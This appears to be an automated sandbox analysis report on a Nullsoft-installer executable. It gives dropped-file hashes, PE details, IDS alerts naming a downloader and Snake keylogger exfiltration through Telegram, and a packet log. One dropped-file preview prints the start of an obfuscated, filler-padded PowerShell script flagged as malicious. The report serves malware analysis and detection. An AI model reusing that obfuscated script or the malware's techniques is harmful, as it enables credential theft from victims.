                                                                                                  SHA-256:3CCCCC1F5F6180A0CF200F973D9A91E7DE6403C03B3CA350D6E7705CEAB5746E
                                                                                                  SHA-512:3577863E0CE0120790040B8B039506D211F4E6A360DCF5EDC93BCAE8ECA84A9D41AAC1BD8A059AA310E08DCCD9B77D011524F567A30CAEA550D6E0A56C0CE885
                                                                                                  Malicious:false
                                                                                                  Preview:.......`...........................N........................................................................................................?..................................................B..................................................................................s0............r..............g...........................2.....U.......................w........................,.......a............................................7......T..........}.......................4..........................?.......................................................y..............;....&...............................7............................M................................<.......................................................................H..................................................................'..............H.~...Y..Q..............................=.................................................................................!....................................#........
                                                                                                  Process:C:\Users\user\Desktop\dP5z8RpEyQ.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):465866
                                                                                                  Entropy (8bit):1.2514432236200588
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:vHqN+QT7NbiCsIpfQDI+xuQpuOI+tLuP08PFz+yrWf3Q1C:vKNzoCsIxQ5uQQO4D0yC4Q
                                                                                                  MD5:D8A0163EED8669B65C2F2DDC450692C5
                                                                                                  SHA1:871F4295509FE783E5BCA0D3F2A5219F5CF9E1D5
                                                                                                  SHA-256:4058D63BB05B740BF8F3D0AFA6D66E26B116176BE8EEAF53DE899C89EE004BAC
                                                                                                  SHA-512:BAF4842650727E7616933FAF4F7C35BB6A34E0154D2F6592D1E73F22319D77D5F0836B2B620380A8228F98DDA3096560EC4E0C395FD3638F0A770B603CD78210
                                                                                                  Malicious:false
                                                                                                  Preview:.$....i......T.............................................b.................<.............................................j.............................&.........................................+.f..........................................$.....................e....T...................................................!...............................................................................z....D.........................................;..................................................@........................0...........z.................].........................................................e.u...2................u.................+...............................p...................................................................C>....%.....................................................................................................................................e................c.................A..................\..............(.......................................
                                                                                                  Process:C:\Users\user\Desktop\dP5z8RpEyQ.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):488692
                                                                                                  Entropy (8bit):1.2603012808246417
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:YErbOR7jAcNL+UV+dVXY7Uf7JAumIpcnXoe/:drQ78cjVmXYof7JAuh
                                                                                                  MD5:09F763BA39A24F93598CD2C89B5B4FDD
                                                                                                  SHA1:3957EE388E824359D925B7D06E252564E5D8364C
                                                                                                  SHA-256:5C1B06A6BBEA8227CD879215257E7D1B622CA45A86D9F7B79F7F5509F345453D
                                                                                                  SHA-512:1BE9944FDB9657CF154885AB492F3446ACB643F0FDA3ED8C1D6B8376F3DD539CA932402D2FC3B6D302945E4BAB8343B3F71EFA712AD7FCAA30811CB938E2F9AE
                                                                                                  Malicious:false
                                                                                                  Preview:..................................................m.p.............................................X........n............e........................f.......................~......................................................0|...............................................Q........................5...........................................................................................................................&.................................|..........................................................................................................................,.....8...........................r.........q..........h................E....................*........................................................................................J.....~....c.......................4................................t...........{.......i...............%..............&.......7.............{......................................................b..........................................
                                                                                                  Process:C:\Users\user\Desktop\dP5z8RpEyQ.exe
                                                                                                  File Type:ASCII text, with very long lines (319), with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):550
                                                                                                  Entropy (8bit):4.2793418541681625
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12:lXkKyDv7SKGNsQA8Br/OTuUmDrAM9MhrdEoRIEAU+/mKTxQ:NDYmdzrrwuf3YxiVP/mGxQ
                                                                                                  MD5:967A6AC85E1CDB898B7BE498438BB192
                                                                                                  SHA1:E9EACBEA72CDBA06DE0C82F142F49FDC5271F60D
                                                                                                  SHA-256:BE9BD9780A7ACE4D5EA238417CC9D3FD3CC20C39914B703E118E9DF0EA9DC544
                                                                                                  SHA-512:9F26F6C62F069706972E4BB695E3BE1F82A7B495D7770AB6771F0B4DA4293355E6D5CE9975EDEC8B9B8AB82730A025DE23199033EB41355F6D36FE20A99016F4
                                                                                                  Malicious:false
                                                                                                  Preview:overheadprojektorens computist depravement muslims bndslers spredningsmetoders inconsumable,bogholderierne wahl bosatte,boweling fenouillet snadden pleasantness assman naevoid forspildes.caddicefly bagind tidemarks novemberdagenes acediamine tennisens salpernes ambitious gypsying abying rikkes superterraneous micklass..proklitisk cockbilled foderblandingers benpiber eksistensberettigelsers bundens.changos termitboerne inaktivt nonsynthetical oilish macrocheilia sikkerhedsanordnings bryderis splicers molybdocardialgia hvergang ufremkommelighed..
                                                                                                  Process:C:\Users\user\Desktop\dP5z8RpEyQ.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):407810
                                                                                                  Entropy (8bit):1.2513140336585074
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:oDCT778iwaK5hrCTUS+XZiMbIjrrNapegGNn5a71/uvQY2wCtc0F6vjmGW69XvDr:Ghr8oluBBY/+9fZiYOn7eTFrbojHl+
                                                                                                  MD5:AB95CAF19BED14E2F50D1AB015DAB1CC
                                                                                                  SHA1:59938F74BA9B3E641874221E2256011D5B563969
                                                                                                  SHA-256:815EB8FB0D8512235429CCF3993ED9EE2626ECE8A53BC723A1BE45FF29026832
                                                                                                  SHA-512:3984DE8FA9261C1FED982B968BC69D83DCEC250084EA65595E6FF668E733614864A820AD8B66CB0D39D3E21E09AB13E5811D131A365F1097FC49873511D1C13F
                                                                                                  Malicious:false
                                                                                                  Preview:.........................@........&......................................................b..............S....p...........................................^..............................6..........u..........................7.................................)..............}..............................o................a.........1........................................................................................f...........................................J...................(......(.......).......................g.....O........Y.................D........&...........X.................................................................5.................................."[.............~..........................................}......................[.......................................................".............|.....................................................................!............l................................................^........................................
                                                                                                  Process:C:\Users\user\Desktop\dP5z8RpEyQ.exe
                                                                                                  File Type:ASCII text, with very long lines (4375), with CRLF, LF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):71938
                                                                                                  Entropy (8bit):5.170526697757035
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:IjpVbImbWa4UGqsXE3FPZ/JTVAoc0SYxEtfIZyd80pIDP:APpWMSE3dZ1cCCSZydtOL
                                                                                                  MD5:3C498D0B534B7F6C953D6535231AC945
                                                                                                  SHA1:EF27C35F06E00D3EA2B0843242EEFE05D3DC6849
                                                                                                  SHA-256:BB83D905F078B5E750204B9EA347D1C3F68365E634833A52D5D2F5707E96544B
                                                                                                  SHA-512:0ACBAF462636D17ECA13EA738C3AE3A10A7E2736B4AEB11C0E76C1A96AAD08975AABEEE66A4815AD2753CA883147330E74D9A50B0B1B53062E24B479EC6A5B33
                                                                                                  Malicious:true
                                                                                                  Preview:$Lated28=$Granulationerne;..<#barrikaderingers Remserne Taktikken Agglutinations Splendidt #>..<#Akkilessenes Vederstyggelighed Vaginipennate Rkensandet Azure #>..<#Exognathion Checkkontoen Macrotherioid #>..<#Contrariwise pistilliform Apostrof #>..<#Udnvnelseskompetencen Lingvistiskes Undernourishment Firecifrede Nondecatoic #>..<#Mangue Tsedrengens Unsecurable Layoutmands #>...$griflede = @'.A,nabet.Hjlpemo$Go tfolWUsgsgooe Desoria TelefolrangsfosTo,enon=Headpho$KardinaHPompserjPiranhaetudbrlemSkrikeamUglifyueStofp imOverhalepils ernInterafnAdopt neBolsjevskohortekprov sieRegionstBlobbersOvarioc;Nomi al.Carbolif thmoluBlodplan,ndotracSkavekntTrappydi imatiaoSt nfisnHush ld AntilytBHagendeaSkiffomldealcohaMedianin fieldwcAmerce e S rjterGyp,yis Friture(unmolli$ UhyggeOabsorbivQuadruae stofndnAfsyngemPrintmeaHy ercanMisaffi,Toxipho$Clearh,SColoniatPtomai rDu,ligsaKbehuleaSvingtutnaphthoaUnqualigRisengresprl ket Vankels Bouffo) Blrero Delen e{Chemico. ognat.Udsmide$For.gsaVMenstrueQ.e
                                                                                                  Process:C:\Users\user\Desktop\dP5z8RpEyQ.exe
                                                                                                  File Type:DIY-Thermocam raw data (Lepton 3.x), scale 0-0, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 0.000000, slope 0.167726
                                                                                                  Category:dropped
                                                                                                  Size (bytes):351494
                                                                                                  Entropy (8bit):7.617756558103273
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:6144:eGcGrVt2f+HvURtQ/3rheYxP4Eb0UXMAvXWU2kb+MqtFDcmz9fKkL8usK:5W+s/Q/3VjWa0UXMAl+ptlrt8usK
                                                                                                  MD5:005E43CCC24B66B9D72405C0D1BA5503
                                                                                                  SHA1:45B673AFA54E7E7DBD479901402D1D8499B386D1
                                                                                                  SHA-256:B25848DD6BFF93E4F6BB007053E1575904E7DD2BF7ACC242141FF12A766C77AB
                                                                                                  SHA-512:2B650953FBBE5FED2DECB69D92975F40A1235B0622C6348A5C6A362FD93144915C88C55D6467A1E009548F358CF95E3822B6ECE33137ED8D33D480E8960C5ACE
                                                                                                  Malicious:false
                                                                                                  Preview:.........ww.......k...............__.....;;.......FFF....................................h.f.....mm..............$..777.```.....L.............9................?.......6......d...@@......QQ.........$...>......$..[......==.8....~~............0..........0.....|.................+++.aaaa....?...................Y............E.AA.....11111.........NN.......o..........zzz...+.W....Z...............XX..ooo...S...............!!.W...f.**.)... .....yyy..o............................11...;;....*....,.......................}.......H...........77....$$$.....0.......Y.......k.......V............-----.v................................................................LLLLLLL.o...QQ.......ggg........""...........................&............#.Y...w......"".........................EEE..................``..ee..............N.....L.....................0.:.............................44...a.....hh...{.....#..T.........OO..eee..............................f.......N.......XX........ssss........o..........7....JJ.
                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                  Entropy (8bit):7.86126561414568
                                                                                                  TrID:
                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                  File name:dP5z8RpEyQ.exe
                                                                                                  File size:841'568 bytes
                                                                                                  MD5:307b33a50dcda8511f357c5de9da6b02
                                                                                                  SHA1:ea0cd2a9546e4634ebd3cfe37fd73f5a8aabd0b8
                                                                                                  SHA256:57a4244a8e2bdb2428fb0801c42f6c78af7ec0ef1b23bd558e01ecb61a1104b1
                                                                                                  SHA512:6616c5c2feb38b86a4083f9b6c2c4734459dbbab356cb35388a60908b245e374fb70d1df0428c1da52f4ff94e79d32711ce1fa37ac89f08f5ffb8d491d99e95e
                                                                                                  SSDEEP:24576:8Vh9IS4w4n7/adSqdf9IacPYkAevLRPJyz:O9P4n7/KrdfmD3RtJS
                                                                                                  TLSH:4A051207222AE1E0D82CC836451775F65BC95C219D0E6E2B3156BF3B39F12E4BE1B627
                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!.@.@...@...@../O...@...@..L@../O...@...c...@..+F...@..Rich.@..........PE..L......`.................d....9.....%3............@
                                                                                                  Icon Hash:0765c050447c3e01
                                                                                                  Entrypoint:0x403325
                                                                                                  Entrypoint Section:.text
                                                                                                  Digitally signed:true
                                                                                                  Imagebase:0x400000
                                                                                                  Subsystem:windows gui
                                                                                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                  Time Stamp:0x60FC909C [Sat Jul 24 22:13:48 2021 UTC]
                                                                                                  TLS Callbacks:
                                                                                                  CLR (.Net) Version:
                                                                                                  OS Version Major:4
                                                                                                  OS Version Minor:0
                                                                                                  File Version Major:4
                                                                                                  File Version Minor:0
                                                                                                  Subsystem Version Major:4
                                                                                                  Subsystem Version Minor:0
                                                                                                  Import Hash:ced282d9b261d1462772017fe2f6972b
                                                                                                  Signature Valid:false
                                                                                                  Signature Issuer:CN=Thoroughbred, O=Thoroughbred, L=Charlton Mackrell, C=GB
                                                                                                  Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                                                  Error Number:-2146762487
                                                                                                  Not Before, Not After
                                                                                                  • 05/12/2023 12:17:23 04/12/2026 12:17:23
                                                                                                  Subject Chain
                                                                                                  • CN=Thoroughbred, O=Thoroughbred, L=Charlton Mackrell, C=GB
                                                                                                  Version:3
                                                                                                  Thumbprint MD5:031152494D592A99669DB3F3539F61F7
                                                                                                  Thumbprint SHA-1:E77DF1696E678E92DB95E3557691C328EA7CC347
                                                                                                  Thumbprint SHA-256:96DB86FDFC333496B46E6C1420E37485ED4B295653B692695AFC378A7340044C
                                                                                                  Serial:6F1FAD878FAC814B17C636D3C3A39D1592C98235
                                                                                                  Instruction
                                                                                                  sub esp, 00000184h
                                                                                                  push ebx
                                                                                                  push esi
                                                                                                  push edi
                                                                                                  xor ebx, ebx
                                                                                                  push 00008001h
                                                                                                  mov dword ptr [esp+18h], ebx
                                                                                                  mov dword ptr [esp+10h], 0040A198h
                                                                                                  mov dword ptr [esp+20h], ebx
                                                                                                  mov byte ptr [esp+14h], 00000020h
                                                                                                  call dword ptr [004080B8h]
                                                                                                  call dword ptr [004080BCh]
                                                                                                  and eax, BFFFFFFFh
                                                                                                  cmp ax, 00000006h
                                                                                                  mov dword ptr [007A2F6Ch], eax
                                                                                                  je 00007FF478DE55E3h
                                                                                                  push ebx
                                                                                                  call 00007FF478DE8746h
                                                                                                  cmp eax, ebx
                                                                                                  je 00007FF478DE55D9h
                                                                                                  push 00000C00h
                                                                                                  call eax
                                                                                                  mov esi, 004082A0h
                                                                                                  push esi
                                                                                                  call 00007FF478DE86C2h
                                                                                                  push esi
                                                                                                  call dword ptr [004080CCh]
                                                                                                  lea esi, dword ptr [esi+eax+01h]
                                                                                                  cmp byte ptr [esi], bl
                                                                                                  jne 00007FF478DE55BDh
                                                                                                  push 0000000Bh
                                                                                                  call 00007FF478DE871Ah
                                                                                                  push 00000009h
                                                                                                  call 00007FF478DE8713h
                                                                                                  push 00000007h
                                                                                                  mov dword ptr [007A2F64h], eax
                                                                                                  call 00007FF478DE8707h
                                                                                                  cmp eax, ebx
                                                                                                  je 00007FF478DE55E1h
                                                                                                  push 0000001Eh
                                                                                                  call eax
                                                                                                  test eax, eax
                                                                                                  je 00007FF478DE55D9h
                                                                                                  or byte ptr [007A2F6Fh], 00000040h
                                                                                                  push ebp
                                                                                                  call dword ptr [00408038h]
                                                                                                  push ebx
                                                                                                  call dword ptr [00408288h]
                                                                                                  mov dword ptr [007A3038h], eax
                                                                                                  push ebx
                                                                                                  lea eax, dword ptr [esp+38h]
                                                                                                  push 00000160h
                                                                                                  push eax
                                                                                                  push ebx
                                                                                                  push 0079E528h
                                                                                                  call dword ptr [0040816Ch]
                                                                                                  push 0040A188h
                                                                                                  Programming Language:
                                                                                                  • [EXP] VC++ 6.0 SP5 build 8804
                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x84380xa0.rdata
                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x3bd0000x14130.rsrc
                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0xcce380x928.data
                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x80000x29c.rdata
                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                  .text0x10000x62300x64001ac97b0b8e41e1ffbb716878bb5109f2False0.6699609375data6.441889952551939IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                  .rdata0x80000x12740x1400b8e42f3d3b81b0e2a4080ab31bc2d1f4False0.4337890625data5.061067348371254IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                  .data0xa0000x3990780x600be2892f1b11a971e0c6c4e83000268f5unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                  .ndata0x3a40000x190000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                  .rsrc0x3bd0000x141300x1420074d1354884b47e58064558c4fcf827a8False0.21642080745341616data5.032566659343803IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                  RT_ICON0x3bd4480x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 0EnglishUnited States0.1216102585663233
                                                                                                  RT_ICON0x3c68f00x2ca8Device independent bitmap graphic, 96 x 192 x 8, image size 0EnglishUnited States0.33869839048285516
                                                                                                  RT_ICON0x3c95980x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishUnited States0.22634854771784232
                                                                                                  RT_ICON0x3cbb400x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishUnited States0.31636960600375236
                                                                                                  RT_ICON0x3ccbe80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishUnited States0.30676972281449894
                                                                                                  RT_ICON0x3cda900x988Device independent bitmap graphic, 24 x 48 x 32, image size 0EnglishUnited States0.4413934426229508
                                                                                                  RT_ICON0x3ce4180x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishUnited States0.3768050541516246
                                                                                                  RT_ICON0x3cecc00x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0EnglishUnited States0.4400921658986175
                                                                                                  RT_ICON0x3cf3880x668Device independent bitmap graphic, 48 x 96 x 4, image size 0EnglishUnited States0.14634146341463414
                                                                                                  RT_ICON0x3cf9f00x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishUnited States0.43786127167630057
                                                                                                  RT_ICON0x3cff580x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishUnited States0.37056737588652483
                                                                                                  RT_ICON0x3d03c00x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishUnited States0.18548387096774194
                                                                                                  RT_ICON0x3d06a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishUnited States0.4594594594594595
                                                                                                  RT_DIALOG0x3d07d00x100dataEnglishUnited States0.5234375
                                                                                                  RT_DIALOG0x3d08d00x11cdataEnglishUnited States0.6056338028169014
                                                                                                  RT_DIALOG0x3d09f00xc4dataEnglishUnited States0.5918367346938775
                                                                                                  RT_DIALOG0x3d0ab80x60dataEnglishUnited States0.7291666666666666
                                                                                                  RT_GROUP_ICON0x3d0b180xbcdataEnglishUnited States0.601063829787234
                                                                                                  RT_VERSION0x3d0bd80x214dataEnglishUnited States0.5338345864661654
                                                                                                  RT_MANIFEST0x3d0df00x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795
                                                                                                  DLLImport
                                                                                                  ADVAPI32.dllRegCreateKeyExA, RegEnumKeyA, RegQueryValueExA, RegSetValueExA, RegCloseKey, RegDeleteValueA, RegDeleteKeyA, AdjustTokenPrivileges, LookupPrivilegeValueA, OpenProcessToken, SetFileSecurityA, RegOpenKeyExA, RegEnumValueA
                                                                                                  SHELL32.dllSHGetFileInfoA, SHFileOperationA, SHGetPathFromIDListA, ShellExecuteExA, SHGetSpecialFolderLocation, SHBrowseForFolderA
                                                                                                  ole32.dllIIDFromString, OleInitialize, OleUninitialize, CoCreateInstance, CoTaskMemFree
                                                                                                  COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                                                                                                  USER32.dllSetClipboardData, CharPrevA, CallWindowProcA, PeekMessageA, DispatchMessageA, MessageBoxIndirectA, GetDlgItemTextA, SetDlgItemTextA, GetSystemMetrics, CreatePopupMenu, AppendMenuA, TrackPopupMenu, FillRect, EmptyClipboard, LoadCursorA, GetMessagePos, CheckDlgButton, GetSysColor, SetCursor, GetWindowLongA, SetClassLongA, SetWindowPos, IsWindowEnabled, GetWindowRect, GetSystemMenu, EnableMenuItem, RegisterClassA, ScreenToClient, EndDialog, GetClassInfoA, SystemParametersInfoA, CreateWindowExA, ExitWindowsEx, DialogBoxParamA, CharNextA, SetTimer, DestroyWindow, CreateDialogParamA, SetForegroundWindow, SetWindowTextA, PostQuitMessage, SendMessageTimeoutA, ShowWindow, wsprintfA, GetDlgItem, FindWindowExA, IsWindow, GetDC, SetWindowLongA, LoadImageA, InvalidateRect, ReleaseDC, EnableWindow, BeginPaint, SendMessageA, DefWindowProcA, DrawTextA, GetClientRect, EndPaint, IsWindowVisible, CloseClipboard, OpenClipboard
                                                                                                  GDI32.dllSetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectA, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                                                                                                  KERNEL32.dllGetExitCodeProcess, WaitForSingleObject, GetProcAddress, GetSystemDirectoryA, WideCharToMultiByte, MoveFileExA, ReadFile, GetTempFileNameA, WriteFile, RemoveDirectoryA, CreateProcessA, CreateFileA, GetLastError, CreateThread, CreateDirectoryA, GlobalUnlock, GetDiskFreeSpaceA, GlobalLock, SetErrorMode, GetVersion, lstrcpynA, GetCommandLineA, GetTempPathA, lstrlenA, SetEnvironmentVariableA, ExitProcess, GetWindowsDirectoryA, GetCurrentProcess, GetModuleFileNameA, CopyFileA, GetTickCount, Sleep, GetFileSize, GetFileAttributesA, SetCurrentDirectoryA, SetFileAttributesA, GetFullPathNameA, GetShortPathNameA, MoveFileA, CompareFileTime, SetFileTime, SearchPathA, lstrcmpiA, lstrcmpA, CloseHandle, GlobalFree, GlobalAlloc, ExpandEnvironmentStringsA, LoadLibraryExA, FreeLibrary, lstrcpyA, lstrcatA, FindClose, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, SetFilePointer, GetModuleHandleA, FindNextFileA, FindFirstFileA, DeleteFileA, MulDiv
                                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                                  EnglishUnited States
                                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                  2024-12-17T12:06:06.476206+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.549813172.217.19.174443TCP
                                                                                                  2024-12-17T12:06:20.639801+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549834193.122.130.080TCP
                                                                                                  2024-12-17T12:06:26.702351+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549834193.122.130.080TCP
                                                                                                  2024-12-17T12:06:29.129790+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.549867149.154.167.220443TCP
                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                  Dec 17, 2024 12:06:03.695621014 CET49813443192.168.2.5172.217.19.174
                                                                                                  Dec 17, 2024 12:06:03.695658922 CET44349813172.217.19.174192.168.2.5
                                                                                                  Dec 17, 2024 12:06:03.695735931 CET49813443192.168.2.5172.217.19.174
                                                                                                  Dec 17, 2024 12:06:03.706338882 CET49813443192.168.2.5172.217.19.174
                                                                                                  Dec 17, 2024 12:06:03.706353903 CET44349813172.217.19.174192.168.2.5
                                                                                                  Dec 17, 2024 12:06:05.592294931 CET44349813172.217.19.174192.168.2.5
                                                                                                  Dec 17, 2024 12:06:05.592370033 CET49813443192.168.2.5172.217.19.174
                                                                                                  Dec 17, 2024 12:06:05.593064070 CET44349813172.217.19.174192.168.2.5
                                                                                                  Dec 17, 2024 12:06:05.593111992 CET49813443192.168.2.5172.217.19.174
                                                                                                  Dec 17, 2024 12:06:05.641726971 CET49813443192.168.2.5172.217.19.174
                                                                                                  Dec 17, 2024 12:06:05.641753912 CET44349813172.217.19.174192.168.2.5
                                                                                                  Dec 17, 2024 12:06:05.642086029 CET44349813172.217.19.174192.168.2.5
                                                                                                  Dec 17, 2024 12:06:05.642137051 CET49813443192.168.2.5172.217.19.174
                                                                                                  Dec 17, 2024 12:06:05.644370079 CET49813443192.168.2.5172.217.19.174
                                                                                                  Dec 17, 2024 12:06:05.691329956 CET44349813172.217.19.174192.168.2.5
                                                                                                  Dec 17, 2024 12:06:06.476211071 CET44349813172.217.19.174192.168.2.5
                                                                                                  Dec 17, 2024 12:06:06.476639986 CET49813443192.168.2.5172.217.19.174
                                                                                                  Dec 17, 2024 12:06:06.476665020 CET44349813172.217.19.174192.168.2.5
                                                                                                  Dec 17, 2024 12:06:06.476773024 CET49813443192.168.2.5172.217.19.174
                                                                                                  Dec 17, 2024 12:06:06.476773024 CET49813443192.168.2.5172.217.19.174
                                                                                                  Dec 17, 2024 12:06:06.476836920 CET44349813172.217.19.174192.168.2.5
                                                                                                  Dec 17, 2024 12:06:06.477047920 CET44349813172.217.19.174192.168.2.5
                                                                                                  Dec 17, 2024 12:06:06.477127075 CET49813443192.168.2.5172.217.19.174
                                                                                                  Dec 17, 2024 12:06:06.477127075 CET49813443192.168.2.5172.217.19.174
                                                                                                  Dec 17, 2024 12:06:06.714679956 CET49819443192.168.2.5142.250.181.1
                                                                                                  Dec 17, 2024 12:06:06.714778900 CET44349819142.250.181.1192.168.2.5
                                                                                                  Dec 17, 2024 12:06:06.716315031 CET49819443192.168.2.5142.250.181.1
                                                                                                  Dec 17, 2024 12:06:06.717165947 CET49819443192.168.2.5142.250.181.1
                                                                                                  Dec 17, 2024 12:06:06.717200041 CET44349819142.250.181.1192.168.2.5
                                                                                                  Dec 17, 2024 12:06:08.417800903 CET44349819142.250.181.1192.168.2.5
                                                                                                  Dec 17, 2024 12:06:08.418935061 CET49819443192.168.2.5142.250.181.1
                                                                                                  Dec 17, 2024 12:06:08.422559023 CET49819443192.168.2.5142.250.181.1
                                                                                                  Dec 17, 2024 12:06:08.422590971 CET44349819142.250.181.1192.168.2.5
                                                                                                  Dec 17, 2024 12:06:08.422921896 CET44349819142.250.181.1192.168.2.5
                                                                                                  Dec 17, 2024 12:06:08.426235914 CET49819443192.168.2.5142.250.181.1
                                                                                                  Dec 17, 2024 12:06:08.427387953 CET49819443192.168.2.5142.250.181.1
                                                                                                  Dec 17, 2024 12:06:08.471338034 CET44349819142.250.181.1192.168.2.5
                                                                                                  Dec 17, 2024 12:06:11.455449104 CET44349819142.250.181.1192.168.2.5
                                                                                                  Dec 17, 2024 12:06:11.455564976 CET49819443192.168.2.5142.250.181.1
                                                                                                  Dec 17, 2024 12:06:11.468358040 CET44349819142.250.181.1192.168.2.5
                                                                                                  Dec 17, 2024 12:06:11.468493938 CET49819443192.168.2.5142.250.181.1
                                                                                                  Dec 17, 2024 12:06:11.575191021 CET44349819142.250.181.1192.168.2.5
                                                                                                  Dec 17, 2024 12:06:11.575292110 CET49819443192.168.2.5142.250.181.1
                                                                                                  Dec 17, 2024 12:06:11.575356960 CET44349819142.250.181.1192.168.2.5
                                                                                                  Dec 17, 2024 12:06:11.575769901 CET49819443192.168.2.5142.250.181.1
                                                                                                  Dec 17, 2024 12:06:11.577380896 CET44349819142.250.181.1192.168.2.5
                                                                                                  Dec 17, 2024 12:06:11.577512980 CET49819443192.168.2.5142.250.181.1
                                                                                                  Dec 17, 2024 12:06:11.646929979 CET44349819142.250.181.1192.168.2.5
                                                                                                  Dec 17, 2024 12:06:11.647000074 CET49819443192.168.2.5142.250.181.1
                                                                                                  Dec 17, 2024 12:06:11.651089907 CET44349819142.250.181.1192.168.2.5
                                                                                                  Dec 17, 2024 12:06:11.653223991 CET49819443192.168.2.5142.250.181.1
                                                                                                  Dec 17, 2024 12:06:11.653248072 CET44349819142.250.181.1192.168.2.5
                                                                                                  Dec 17, 2024 12:06:11.653321028 CET49819443192.168.2.5142.250.181.1
                                                                                                  Dec 17, 2024 12:06:11.656657934 CET44349819142.250.181.1192.168.2.5
                                                                                                  Dec 17, 2024 12:06:11.662256956 CET49819443192.168.2.5142.250.181.1
                                                                                                  Dec 17, 2024 12:06:11.664386034 CET44349819142.250.181.1192.168.2.5
                                                                                                  Dec 17, 2024 12:06:11.664489985 CET49819443192.168.2.5142.250.181.1
                                                                                                  Dec 17, 2024 12:06:11.665747881 CET44349819142.250.181.1192.168.2.5
                                                                                                  Dec 17, 2024 12:06:11.668237925 CET49819443192.168.2.5142.250.181.1
                                                                                                  Dec 17, 2024 12:06:11.673661947 CET44349819142.250.181.1192.168.2.5
                                                                                                  Dec 17, 2024 12:06:11.673784971 CET49819443192.168.2.5142.250.181.1
                                                                                                  Dec 17, 2024 12:06:11.676435947 CET44349819142.250.181.1192.168.2.5
                                                                                                  Dec 17, 2024 12:06:11.680191994 CET49819443192.168.2.5142.250.181.1
